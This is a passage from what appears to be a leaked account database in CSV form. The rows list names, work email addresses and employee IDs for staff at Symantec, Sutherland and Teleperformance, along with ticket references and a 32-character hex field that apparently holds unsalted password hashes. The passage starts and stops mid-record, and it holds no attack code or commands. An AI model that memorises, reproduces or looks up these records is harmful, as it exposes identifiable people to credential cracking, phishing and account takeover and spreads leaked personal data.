3a2b-47f5-8eeb-9ac5d2556dd1,<blank>,<blank>,sonam_pal@SUTH.COM,PM - 2/20/2012 -
CRQ000000560497,5762e1975d56ecca3d6fd1480e23cc7d,Pal,<blank>,125034,Sonam,NULL,N
ULL,NULL
448d-469a-985f-94c07473f565,<blank>,<blank>,prashant_kulkarni3@SUTH.COM,PM - 2/2
0/2012 - CRQ000000560500,53d8e3ba9671894d21c576b3732737be,Kulkarni,<blank>,12503
5,Prashant,NULL,NULL,NULL
7046-4f31-8f66-e987ef2f18c7,CRQ000000322852-CLNP-18/08/2011,000-0000,anshu_jaisw
al@symantec.suth.com,Sutherland,b45323b05ae710060c5810da0cd9616e,Jaiswal,<blank>
,119709,Anshu,NULL,NULL,NULL
c978-471e-89fa-e4db78a804c5,09/02/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherlnad,5ad0936807b4abafe13fdb69ac4ad27e,Rao_cc,<blank>,099330,Prabhakar,NULL,
NULL,NULL
43ad-418c-a0c0-46af12079620,CRQ000000322878-CLNP-18/08/2011,000-0000,francisvinc
entpaulem@symantec.suth.com,Sutherland,9e2a89378f4fcbfa92db34ee8b6681aa,Villanue
va,<blank>,119729,FrancisVincentPaulEmpleo,NULL,NULL,NULL
a22f-420b-90fb-6b6543cfe33f,RM-feb22 2012- CRQ000000565293,<blank>,mstephan@tele
performance.gr,<blank>,8c1b38cf40484df443a256332f25b3da,Stephan,<blank>,125217,M
anja,NULL,NULL,NULL
a1e6-4eae-983f-f58cac741707,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568726,885f537e7fcf029b313863d2730169a8,Kahlela Cortes Parallag,<
blank>,125302,Norienne ,NULL,NULL,NULL
2ce9-4237-b32c-cb6c7ce835e4,CRQ000000322950-CLNP-18/08/2011,000-0000,nerissasayo
n_monfort@symantec.suth.com,Sutherland,899486a99e6f75e6feb02d81d5401b5e,Monforte
,<blank>,119745,NerissaSayon,NULL,NULL,NULL
80f4-40d8-a4d1-084c9bbd8e29,"CRQ000000323279 - RJ - Aug 18, 2011",000-0000,mayur
_joshi1@SUTH.com,Sutherland,63bc48778ada18c8d0b9df5d2408253c,Joshi,<blank>,11977
4,Mayur,NULL,NULL,NULL
63ce-40ad-8f12-d7db7b0daec8,<blank>,EMPROV,accounts@symantec.teleperformance.gr,
Teleperformance,17e9952fbd1afdb0a67d589c3207a5d1,Adamidou,<blank>,099234,Katerin
a,NULL,NULL,NULL
75d3-4ddc-9927-4378d7f2c2d5,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570854,285d3cbb9552bee42f5ccfc9a714d6d9,Hitesh,<blank>,125348,P Sh
ruthi,NULL,NULL,NULL
81f8-4e3b-932b-4f0525f8c23e,CRQ000000589221 SP 13 Mar 2012,999-999-9999,irfan_kh
an2@symantec.suth.com,Sutherland,1a2e791b9cb5aa1fc6bfda6547407b78,Khan,<blank>,2
22404,Irfan,NULL,NULL,NULL
b41f-42a6-bdab-7ad42fe00c5c,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - REQ000001305615,8e089af358dc1e43ac8992243808c078,Nair,<blank>,222447,San
desh,NULL,NULL,NULL
ab16-499d-af2d-57b369fb746c,12/02/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,f3e22fb069a0bf849a3d27b089b38d48,RaoV_cc,<blank>,099414,Ranganath,NULL
,NULL,NULL
735b-4294-8940-e2e492bb88b8,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,05c555c3d76e5d2ab772689ec6cba8be,ABermudez,<blank>,098182,Katrina Joy
,NULL,NULL,NULL
6c2d-47f6-a970-1e0dcf9cada1,<blank>,<blank>,Krishna_Prasad_AV@symantec.com,Syman
tec,31fc0ccb38a08bc39ad68c62e7a13891,Prasad AV,<blank>,111815,Krishna,NULL,NULL,
NULL
4b20-41ab-a367-0c468b26143f,CRQ000000322859-CLNP-18/08/2011,000-0000,jandavidsol
anter_aqu@symantec.suth.com,Sutherland,98e176895dc779d92de40057bdee0da6,Aquino,<
blank>,119711,Jan David Solanter,NULL,NULL,NULL
f9b2-4820-87b2-0b516539078d,<blank>,<blank>,Melvin_M@symantec.com,Symantec,bccc3
d0755e7e69bc36a1c9f11c01861,M,<blank>,111803,Melvin,NULL,NULL,NULL
88ab-4f40-9568-7427a38b7baa,<blank>,<blank>,Muralidaran_G@symantec.com,Symantec,
03b19f68ae7ad2f5b0ee4c5a4edae842,G,<blank>,111836,Muralidaran,NULL,NULL,NULL
0077-4a55-88d4-e1d9e0e65720,<blank>,<blank>,Karthik_S1@symantec.com,<blank>,003a
92b9ed7db815010e6015feeda445,S1,<blank>,111814,Karthik,NULL,NULL,NULL
7e49-4385-9a96-4a8d7c322bf9,RM-10feb 2012-,<blank>,tools_id@symantec.suth.com,RM
-10feb 2012-CRQ000000551696,7388b9079583c30b7c8afb01213d1ee3,Mayekar,<blank>,124
766,Anushree ,NULL,NULL,NULL
168e-4ea7-a6a2-0ff1612b6226,CRQ000000322887-CLNP-18/08/2011,000-0000,markgilsim_
bigbig@symantec.suth.com,Sutherland,36646a58281ed73e23f613487744eb97,Bigbig,<bla
nk>,119732,MarkGilSim,NULL,NULL,NULL
4eb6-4ac7-add0-df7e90ac4da4,NA 17 Mar 2011,CRQ000000220910,tools_id@symantec.sut
h.com,<blank>,555fa302f6723a4f060efe68c2cf3867,Yalamanchili,<blank>,113972,Sunil
,NULL,NULL,NULL
7e87-4d2c-9a83-ed31ba0f3b80,CRQ000000322890-CLNP-18/08/2011,000-0000,johnlouiepa
glinawan_@symantec.suth.com,Sutherland,335076db52b7c5853f37fa98488651c5,Diola,<b
lank>,119733,JohnLouiePaglinawan,NULL,NULL,NULL
92fb-45df-bad9-968498a9ac38,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,95a7eef49ebfec53a43617558ef5dc16,Panchangam,<blank>,090337,Madhu,NULL
,NULL,NULL
5128-40e7-9295-c9bc52d68b66,VMD--23/08/2011,000-000,tools_id@symantec.suth.com,S
utherland,a9ea4b595d2a759e3088e833be213d9d,Kanth,<blank>,086162,Saji,NULL,NULL,N
ULL
52fb-4276-9825-7d568db73a1e,CRQ000000399909-CLNP-10/11/2011,000-0000,edward.boer
@teleperformance.nl,Teleperformance,b3859f4d931c690351b8f4984be282c8,Boer,<blank
>,122320,Edward,NULL,NULL,NULL
0f3f-422b-aaec-f67689785007,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
561653 - 20th Feb 2012,0de6ae805ebfb1eca7a4c4d8c30d76f8,Kumar,<blank>,079069,Bis
maya,NULL,NULL,NULL
0b63-4ec3-8c22-38108f3eccfd,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,d832ae5632c54315643301d50b86a2ca,Narayanan,<blank>,07559
7,Shankar,NULL,NULL,NULL
1c6c-4b16-b5ce-b5d0f008bd0f,<blank>,<blank>,alexander_wiser@symantec.com,Symante
c,c757f664e75978568577680728a96dc9,Wiser,<blank>,alexander_wiser,Alexander,NULL,
NULL,NULL
32d4-418b-8e92-25f7747495a2,bpr-02-06-10,EMPROV/INC185710,Tools_Id@Symantec.Suth
.Com,Sutherland,28f60c0713f01583770faaaed4ff8480,Dubey,<blank>,099527,AmitKumar,
NULL,NULL,NULL
09b4-45c1-88fc-122ae5688763,"CRQ000000588322 CLNP Mar 12, 2012",000-0000,tools_i
d@symantec.suth.com,Sutherland,c87f5bbf6ad6a86b862e4508578713f7,Vsuthaa,<blank>,
099670,Monisha,NULL,NULL,NULL
aa28-4772-9497-b8bbefb1c498,CRQ000000589237 SP 13 Mar 2012,999-999-9999,roshan_k
arkada@symantec.suth.com,Sutherland,4e92cb929c4dd43a96dfc6d94a65b26d,Karkada,<bl
ank>,222414,Roshan,NULL,NULL,NULL
e8c0-4bf6-a6d4-6f71f578d0d8,"CRQ000000592928 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,f778801e4137b189718f995a975c7c41,Gonsalves,<bl
ank>,222484,Tressan,NULL,NULL,NULL
f512-47c5-af58-e29b84303b17,sms 01.10,INC202269,tools_id@symantec.suth.com,Suthe
rland,970e720f4e77dae6d26b5a969afa9bc3,Prasanna Sethy,<blank>,089756,Durga,NULL,
NULL,NULL
f7a7-4ae3-a28a-3a9853cab674,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
208217 - PR - 2/25/2011,9cdde13925e17c83818a1cd01f867099,Raveendranathan,<blank>
,113377,Deepak,NULL,NULL,NULL
05ee-478e-8a1e-5535057ed77a,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,
b7c7b9371def982b64c4231016c7fc0a,Kerwien,<blank>,kevin_kerwien_psagent,Kevin,NUL
L,NULL,NULL
22e0-4f8f-89a3-43b853f3aed3,04/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,de7795ad36befc8c79ed5c556fa6050d,MulodTrinidad,<blank>,100691,NikkiBlo
belle,NULL,NULL,NULL
5ac3-498e-b68a-c7f343e4c113,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,7f74e668d4c199e805637253d3a972dd,BCostales,<blank>,098191,Beau Benedi
ct,NULL,NULL,NULL
f1d1-47c6-9d62-78161a9b29cd,CRQ000000315360---VMD--8/8/2011,000-000,tools_id@sym
antec.suth.com,Sutherland,8b89fe073a4dbc5f278f9bcee459a8b0,Quirante,<blank>,1192
77,Junal Tesaluna,NULL,NULL,NULL
ba14-4f99-971c-d7ce77d3a404,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518111,3e66f3400d32614343cd9ffd163d63ec,Cervantes,<blank>,124167,
RalphAdrian,NULL,NULL,NULL
6e09-42c5-b2d6-6d3b5b6aeebc,CRQ000000221955 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,94bc758ddc9b0dc6e07c7df068496a50,Varghese,<blank>,11400
4,Titto,NULL,NULL,NULL
119c-4037-ac72-99ed72383fe8,CRQ000000315374--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,86607eb386b7d34cf55e64aa445bd574,Fuent,<blank>,119279,L
ourdes Antonette Chiefe,NULL,NULL,NULL
12ff-4d1d-ab63-276365984dea,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570866,80c4f19c0bad765969bc4c965324fce4,Kireeti,<blank>,125351,Roj
anala,NULL,NULL,NULL
c889-4394-a7ad-7066e9a47d2e,<blank>,<blank>,takako_sakashita@symantec.com,Symant
ec,18cd4f6cbe10b5af104309211ee976cd,Sakashita,<blank>,takako_sakashita,Takako,NU
LL,NULL,NULL
c313-4f1d-b984-58a21836d04e,CRQ000000220815,<blank>,tools_id@symantec.suth.com,K
SC-03/18/2011,f521b7aba74130d839b4a84f0c2e79ce,Khan,<blank>,113858,Imran,NULL,NU
LL,NULL
6b89-468e-a08e-10983a6b9f71,CRQ000000315431--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,7700ed9e18b0c36e67f03252a628f422,A M,<blank>,119294,Sha
n,NULL,NULL,NULL
6d28-4f29-b26c-323056516162,CRQ000000518278 SP 24 Jan 2012,000-0000,suman_jalli_
cc@symantec.suth.com,Sutherland,66a4fcac8d3047128263fc2c1a90c27d,Jalli,<blank>,0
99027,Suman,NULL,NULL,NULL
22c9-40d7-b8c4-4b6b4c8bf92f,CRQ000000518278 SP 24 Jan 2012,000-0000,deekshit_cho
wdoju_cc@symantec.suth.com,Sutherland,8fe4057da627c25d82e4aaf13b240cc8,Chowdoju,
<blank>,099033,Deekshit,NULL,NULL,NULL
2b7f-4885-a688-3bb1c731ca03,CRQ000000265666--VMD--26/05/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,89f56657e51fb97c6033ef09d8481973,Patnana,<blank>,1113
73,Bhanu Pratap Siddhu,NULL,NULL,NULL
f30e-4a5f-aafd-3647d48a7e8b,<blank>,<blank>,tools_id@symantec.suth.com,CSK-1/25/
11,c52e1db591f4b9d2a928158713b7af0d,Raghavan,<blank>,112465,Rahul,NULL,NULL,NULL
4726-4541-9e68-30af166fff48,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591407 - PR - 14th March 2012,ba9307c12d15086b1b234056d042442a,Reyes,<blank>,222
415,Nikos Delos ,NULL,NULL,NULL
9b64-4b64-ba25-aecadac750f7,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,82f3c48e4de00c8bccc5c5b7c87680f8,MTan,<blank>,098184,Arlene,NULL,NULL
,NULL
0840-41d6-98f8-fc9a82dc5a00,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591443 - PR - 14th March 2012,7451f2d43439d0555db577d11ba0f53e,Mijares,<blank>,2
22420,Mark Philip,NULL,NULL,NULL
31e2-4e73-adc6-23fd6f57663b,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591449 - PR - 14th March 2012,a5f53c8b503dc0f0113c0351fd210a5a,Peralta,<blank>,2
22422,Paul Evan,NULL,NULL,NULL
e15b-4211-9c80-d113e7cf14ca,CRQ000000190769,<blank>,tools_id@symantec.suth.com,C
SK-1/25/11,cdad034604d9c07e50b8443346da511a,Patel,<blank>,112470,Jasmine,NULL,NU
LL,NULL
6039-4607-8297-68d7b371d6cf,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591453 - PR - 14th March 2012,a2c494654b76137bcedce0ab6ab83597,Quiocho,<blank>,2
22424,Melanie,NULL,NULL,NULL
a0cf-4975-bb77-4dcc71442d4a,CRQ000000218888 - PM - 15/3/2011,<blank>,tools_id@sy
mantec.suth.com,<blank>,03d8a612ddb044154cbd97ba16add497,Misa,<blank>,113927,Bil
lyJames,NULL,NULL,NULL
28c3-4192-a7cd-044c5eba68e9,PM - 5/30/2011 - CRQ000000267153,<blank>,tools_id@sy
mantec.suth.com,<blank>,57cd0d3a23f977a0df803e5c5d53b570,Viswanathan,<blank>,116
572,Meenu,NULL,NULL,NULL
d0b6-420a-9aae-44f7ead7e0b8,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,897538c2d01e546556d6d07d1455fd28,Perocho,<blank>,113234,
Cherry Mae,NULL,NULL,NULL
9bd9-492b-99df-3c4978c2cccd,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,46d985753ad280210daf844b4843de1a,Janardanan,<blank>,099767,Prashanth,NULL,NULL,
NULL
e02e-4953-ba2a-1b9798b4d60a,<blank>,<blank>,tools_id@symantec.suth.com,RM-24-08-
2011-CRQ000000326188,3d8f8d2fabf6072710cb8305af676944,Dcruz,<blank>,119871,Rodne
yOswin,NULL,NULL,NULL
f01d-4a1a-9aa2-e7d638b757d5,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267777 - PR - 5/31/2011,498d94f1cc6056677a2158892ca76170,Mallari,<blank>,116690,
Stephanie Manalansan,NULL,NULL,NULL
bdb6-4885-9da2-73bf73a852b6,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - REQ000001305709,645767bcb52467c7f94521dd5d69d8b6,Belvalkar,<blank>,22245
8,Vipul,NULL,NULL,NULL
5d92-45fd-a7d5-f91a7499f54b,<blank>,<blank>,D_Saravanan@symantec.com,CRQ00000031
5323 - PR - 5th August 2011,d22c93dbde5215fdc2235e2b301b23ca,Saravanan,<blank>,1
18036,D,NULL,NULL,NULL
f068-416f-9c2a-9b3334e0fa53,CRQ000000241079 PBP 15/04/2011,<blank>,MohanRaj_A@sy
mantec.com,Symantec,5670f036eb7e7c58bae0c14eedd62c95,A,<blank>,114486,MohanRaj,N
ULL,NULL,NULL
a18b-4fb4-8d86-697e0373595d,<blank>,SH 29/09/2010,tools_id@symantec.suth.com,<bl
ank>,0b86e5ed7810a2c981976ddd9ca0f8f2,Alagarsamy,<blank>,101055,Sudhakaran,NULL,
NULL,NULL
ba3f-478c-bcd4-bffe758469ad,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591456 - PR - 14th March 2012,14f46153d092dd97293b97dc1783b012,Sumiran,<blank>,2
22428,Bryce Kevin,NULL,NULL,NULL
e2e4-4bae-8fb3-d1e7d4b14bb0,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,3b687c52dcd7d7e8604f849a1834269d,CorazonOng,<blank>,099678,Aurora,NULL,NULL,NUL
L
e3da-46cb-85f6-3dd14a3af2a7,CRQ000000241079 PBP 15/04/2011,000-0000,Dinesh_Bhala
jiCB@symantec.com,Symantec,48429b696733bd9c1da1f7f787277da8,Bhalaji C B,<blank>,
114473,Dinesh,NULL,NULL,NULL
e2df-41be-a745-5757787f7277,CRQ000000241079,<blank>,Selvaraj_M1@symantec.com,KSC
-04/15/2011,e6ddfcac5d788f626fcf1c908892be97,M1,<blank>,114415,Selvaraj,NULL,NUL
L,NULL
c045-44ee-8aa9-3e7317b243bc,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,9e6fd0e9f756e7c18b4cfd911bde6b7a,Aguirre,<blank>,110067,Krisantonette,NULL,
NULL,NULL
fdec-4070-9245-56dafde36b6a,<blank>,<blank>,Unnikrishnan_N@symantec.com,CRQ00000
0315323 - PR - 5th August 2011,477e89522a1f709f7a1dddc7b0982f4c,N,<blank>,118074
,Unnikrishnan ,NULL,NULL,NULL
b9ba-42c4-afc7-6766095c6622,"CRQ000000592913 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,19dd0edc6a70500c6325780e4ba47ecd,Cannell,<blan
k>,222476,John,NULL,NULL,NULL
373b-43de-8c00-95b0a8144a8c,PM - 8/8/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,f9faf433124a7075c2b3635757a3b7cb,Junghare,<blank>,119306,Rahul Vijay,NULL,N
ULL,NULL
a441-4ede-920e-a47a420a987f,SSS 24.02.10,EMPROV,tools_id@symantec.suth.com,EMPRO
V,587ba3a23cc7bbf47c069a688c8989a7,Agarwal,<blank>,099881,Varun,NULL,NULL,NULL
c1b7-484f-a2bd-2f12dec71a78,SSS 24.02.10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,341a6057a7ff8a1b5dd0a74ad68055f7,AnilKumarSingh,<blank>,099886,Khanzembam,
NULL,NULL,NULL
29c5-4bd7-95e3-e6dc8f700985,CRQ000000315371--vmd--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,884a0ef3dc5a78ae75df3e54bca8a966,Reyes,<blank>,119278,J
ofel Ebon Jenen Jasmin,NULL,NULL,NULL
6341-488f-99af-49a593eab803,<blank>,<blank>,symantec_2nd_maa@teleperformance.nl,
TPH,ce608f3f0636391c5bb020bd45e1414e,Bougie,<blank>,TimBougie,Tim,NULL,NULL,NULL
00ea-4ae1-86b7-6a3add04aa33,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,3818563a37228d63168141d7b7b4f86d,Kizhuveetil Soman,<blank>,110185,Sujish,NULL,
NULL,NULL
8f78-4f75-b78c-5ce1a42e6436,"CRQ000000592916 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,8fa13dad1d53aa839a64523eb83756a3,Dhorajiwala,<
blank>,222478,Imran,NULL,NULL,NULL
7880-40aa-a713-dea1f6217aac,CRQ000000322917-CLNP-18/08/2011,000-0000,samdavidesp
ana_rodri@symantec.suth.com,Sutherland,6280d6db245cfd2b8d245807db26b755,Rodrigue
z,<blank>,119740,SamDavidEspana,NULL,NULL,NULL
cf07-4622-9d90-40e5219dc365,CRQ000000325443--VMD--23/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,8ec2eb87a9461e091120569c55d136cb,Aguila,<blank>,10182
2,Ronilo,NULL,NULL,NULL
815d-47be-a56f-941542ee7428,<blank>,<blank>,ullas_thomas@symantec.com,CRQ0000003
88211 - PR - 3rd Nov 2011,bbc3a4c4831526f41c560b0c14fc8a13,Thomas,<blank>,122165
,Ullas ,NULL,NULL,NULL
128d-436e-ab19-134b6fdf3aec,<blank>,<blank>,tools_id@symantec.suth.com,RM-10feb
2012-CRQ000000551702,73f18bd28e611057ee1d3eb11f25a4b3,Roy,<blank>,124767,Partha
,NULL,NULL,NULL
9bb9-4eda-8880-8bed12d4794b,CRQ000000400191-CLNP-10/11/2011,000-0000,kevin.straa
t@teleperformance.nl,Teleperformance,f6465570445371b7d9e92e4befd0c2d6,Straat,<bl
ank>,122321,Kevin,NULL,NULL,NULL
b043-4db2-a151-458bf06d9fd0,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570870,4c76b611436ad3790e55348358837333,Varghese,<blank>,125352,Pr
isty,NULL,NULL,NULL
8b9d-47c6-9a8e-70b0a28e833d,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - CRQ000000591311,3c7e1225a82fc18fc68b40296730b87d,Shetty,<blank>,222437,H
arshit,NULL,NULL,NULL
39b6-4871-97b1-3811be829513,nam-08-12-2010,CRQ000000107579,nh.symantec@teleperfo
rmance.com.ar,Teleperformance Argentina,c5a48fbd1f0fecce2a8d9faa52b1e6bf,Besacci
a,<blank>,068029,Vicky,NULL,NULL,NULL
fea9-45dd-a89b-0a49eb7334f0,WS 18-08-2010,CRQ000000110688,John_Riveral@symantec.
com,<blank>,ce27adbae189d3515bb8268bfb26b2d6,Wong,<blank>,Jonathan_Wong1,Jonatha
n,NULL,NULL,NULL
9fad-4304-9238-772b7e6b3903,VB=03/12/2010,<blank>,nh.symantec@teleperformance.co
m.ar,<blank>,08445c47ffbecade26ff2ad8eeb2a22e,Ferreira de Menezes,<blank>,111167
,Michael ,NULL,NULL,NULL
8c86-4ffb-90aa-dbcb50ff4536,CRQ000000322791-CLNP-18/08/2011,000-0000,suyogvasant
_khedekar@symantec.suth.com,Sutherland,0da9c54c25178c2c97b34cf49faad0ff,Khedekar
,<blank>,119696,Suyog Vasant,NULL,NULL,NULL
bf3a-4231-917c-dcfa4c192918,<blank>,<blank>,Matthew_Nowacek@symantec.com,"RM-CRQ
000000577951-March 02, 2012",4d3590b8b1beb8bf37044505fff3734b,Nowacek,<blank>,12
0515,Matthew,NULL,NULL,NULL
edd4-49ce-839c-6449b2a8da32,CRQ000000589204 SP 13 Mar 2012,999-999-9999,hrushike
sh_khaladkar@sutherland.symantec.com,Sutherland,dd5b2023433af821b1860556dc5a932d
,Khaladkar,<blank>,222394,Hrushikesh,NULL,NULL,NULL
b084-4c63-90e8-b08199e7466c,"CRQ000000592910 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,4a5f2933cb643b525573b3e3a2447022,Indi,<blank>,
222475,Viresh,NULL,NULL,NULL
ae06-4ba5-b44a-ca15e2d31917,CRQ000000228849-KD-29-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,d9ab7780cc37396de242b1d5bb3a5a6d,KumarG,<blank>,099878,R
ubesh,NULL,NULL,NULL
029d-462b-9448-7050c9937a19,CRQ000000228849,<blank>,tools_id@symantec.suth.com,K
SC-03/29/2011,fcc163f50d7fc709252acc7333ac927d,Bhaktharatchagan,<blank>,100402,B
alamurugan,NULL,NULL,NULL
69ab-4090-aa57-4535677cf68c,CRQ000000322803-CLNP-18/08/2011,000-0000,wayneanthon
y_fernand@symantec.suth.com,Sutherland,673517082426e3b7b3f28c570e8ec884,Fernande
s,<blank>,119700,Wayne Anthony,NULL,NULL,NULL
1b3e-4d83-a82c-890daa92f480,bpr-24-03-10,INC137437,tools_id@symantec.suth.com,su
therland,45cd3fd2e535230fc0d9ae7273362932,Rao A,<blank>,091694,Srinivasa,NULL,NU
LL,NULL
35ce-43d1-8d2c-374475afe6cd,sms 01.10,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,9ddd698ebcf9cab44c75c50ee6115a4c,Jaiswal,<blank>,098134,SunilKumar,NU
LL,NULL,NULL
0c30-42f4-9c4d-baf0b1b1ee6b,CRQ000000228849 PBP 29/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,e97a4bfa70a35a847efd6da03e6a0cdf,Capindabongalos,<blank
>,111464,Charity,NULL,NULL,NULL
078f-4d07-8f40-ddf88cceeeda,CRQ000000228849 PBP 29/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,539e1ae2b55712039847f7d599e01e5a,Cenita,<blank>,111745,
Ceazar ian,NULL,NULL,NULL
e28f-4201-8b40-caabee4599b2,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherlands,72739cbce3b2cfc774b1e7a7f184054c,Ramalingam,<blank>,103396,ShyamSund
ar,NULL,NULL,NULL
ece-41c8-8fb0-729928298392,<blank>,87470,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",b0e1d42b7b4ea0e258d11afb45d89b2a,Sharif\xa0 ,<blank>,nawa
z\xa0_sharif\xa0,Nawaz\xa0,NULL,NULL,NULL
af54-4056-9695-fd7db92d1e57,<blank>,CRQ000000207731,tools_id@symantec.suth.com,K
SC-2/24/11,dcda98f1989445b088aa0be448d8bfd7,Potti,<blank>,113315,Rajasekhar,NULL
,NULL,NULL
9a3-4315-a023-60e44798d5e1,<blank>,87472,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",e221a263f356bc08ca752bc4aa648207,\xa0Gupta ,<blank>,\xa0r
aj_\xa0gupta,\xa0Raj,NULL,NULL,NULL
ff2-4457-a46d-e63763638a03,<blank>,87476/2633282,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",f1685b56940ac153f011ae528723c106,Mathew,<blank>,v
ijy_mathew,Vijy,NULL,NULL,NULL
20e3-420c-872a-4eae2bd68030,<blank>,EMPROV,accounts@symantec.teleperformance.gr,
TPG,97b1520c8b778a445ac3588642e949e4,Anna Dura,<blank>,095514,Joanna,NULL,NULL,N
ULL
f4e-4ae2-95e3-21b7578f1158,<blank>,87480/2633284,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",529ea4b7206683c6c1c85adedefb9e49,Basutkar,<blank>
,vijay_basutkar,Vijay,NULL,NULL,NULL
008-42d1-8598-691fcc24bf42,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,ipcdoctor,2
4710303dc33cff72f3982203b0721c4,Watanabe,<blank>,092861,Kazumi,NULL,NULL,NULL
b111-4275-ad77-429e4f12b651,SSS 03/12/09,INC 63679,symantec_2nd_maa@tp-tec.nl,TP
H,5164eb0eba32f3509df68c4b74b2f8f1,Geelhoed,<blank>,096390,Roderik,NULL,NULL,NUL
L
fa95-4c63-a2b5-d9800c61d62b,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
208231 - PR - 2/25/2011,1ca2635d8a222cf9db0d850dd6b740a2,Vishwanathan,<blank>,11
3394,Raja,NULL,NULL,NULL
970-4a09-b178-2a547351f3cb,<blank>,87489/2633284,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",1a03c51c7258bbb770a5c065bd85d637,Shaikh,<blank>,m
uzammil_shaikh,Muzammil,NULL,NULL,NULL
a8a4-4998-b69b-40f41e42fc74,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
208240 - PR - 2/25/2011,fa14031c4695362e73a495dcc359b556,Sreedhar,<blank>,113397
,Bindu,NULL,NULL,NULL
07c-4229-b20e-ebe27f68a267,<blank>,87496/2633284,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",04aee40b926372ce27fa88a1bfabf210,Chakravarthy,<bl
ank>,sonam_chakravarthy,Sonam,NULL,NULL,NULL
f0b-4731-8e9e-8af483f6dfdb,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
282561851de0d04033540992e52a0542,VijayanSuth,<blank>,093249,Vivek,NULL,NULL,NULL
0f61-41c6-be9d-ca273e54a807,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,ded546bdaf92015952bd727daff98c30,A,<blank>,094251,Ganesh,NULL,NULL,NULL
69e0-410d-9fcd-91651b75f729,08/01/2007 - SPJ,EMPROV,Tools_Id@Symantec.Suth.com,S
utherland,329dea387fbc1869b46c25fe3300dcbd,Ghosh,<blank>,098233,Sony,NULL,NULL,N
ULL
81ff-4efb-baea-e90c779d7eb7,<blank>,EMPROV\\INC60083,tools_id@symantec.suth.com,
Sutherland,25ea066b32788689c9640a5ac2bf52bb,Mendoza,<blank>,093632,Christian,NUL
L,NULL,NULL
5713-4c84-87e9-e799a476ff2e,02/06/02010 - SPJ,INC184885,Tools_ID@Symantec.Suth.c
om,Sutherland,44a777c45d33a6ce5b35ceaa1f9298ec,Srivastava,<blank>,087517,Abhishe
k,NULL,NULL,NULL
17a-4837-9454-504768fc49f2,<blank>,87518,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",26ca09384fc5bb0375cb2a81306a5389,Kumar ,<blank>,niranjan_
kumar,Niranjan,NULL,NULL,NULL
c552-4cda-ab3c-7ce4ebcb4224,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,9fc2370a485e98bf5d142e883c4a0acb,Shetty,<blank>,089013,Suyash Dinesh,NULL,NULL,
NULL
39c6-4b05-b216-bb81c4f3df32,SSS 12/01/10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,759e0fd6e523757ab467e5019238fc25,Raghunath,<blank>,098416,Ragavendra,NULL,
NULL,NULL
1d94-459d-bad5-27f00e34223a,<blank>,EMPROV,accounts@symantec.teleperformance.gr,
TPG,15c37421b845ab92cf0d7004a82c9658,Bazarbachian,<blank>,095511,Marie,NULL,NULL
,NULL
4737-4de1-b1b5-18dfff4d39c9,SSS 09.07.10,INC000000213062,suchit_tripathy@symante
